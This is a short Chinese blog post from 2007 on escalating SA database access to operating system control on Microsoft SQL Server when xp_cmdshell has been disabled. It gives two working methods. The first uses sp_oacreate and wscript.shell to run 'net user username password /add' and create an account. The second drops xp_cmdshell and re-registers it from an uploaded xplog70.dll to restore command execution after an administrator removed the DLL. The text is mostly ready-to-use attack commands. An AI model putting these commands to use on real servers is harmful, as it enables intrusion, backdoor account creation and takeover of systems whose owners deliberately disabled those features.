第一种方法:
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user username password /add','0','true'
第二种方法:
因为管理员是直接删除dll文件,而没删除存储过程,你这样恢复肯定是提示存储过程已存在了。你要先删除存储过程,use master
EXEC sp_dropextendedproc 'xp_cmdshell'
然后上传xplog70.dll到某个目录,例如C盘根目录,然后执行
use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
就可以使用cmdshell存储过程执行系统指令了。
风易博客
风萧萧兮易水寒, 壮士一去兮不复还。
2007-8-21 16:17:30
没有xplog70.dll和xp_cmdshell的SA提权
会说话的博客,点我试试:)
Tags:
发布:清风 | 分类:网络安全 | 评论:0 | 引用:0 | 浏览:
- 相关文章:
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
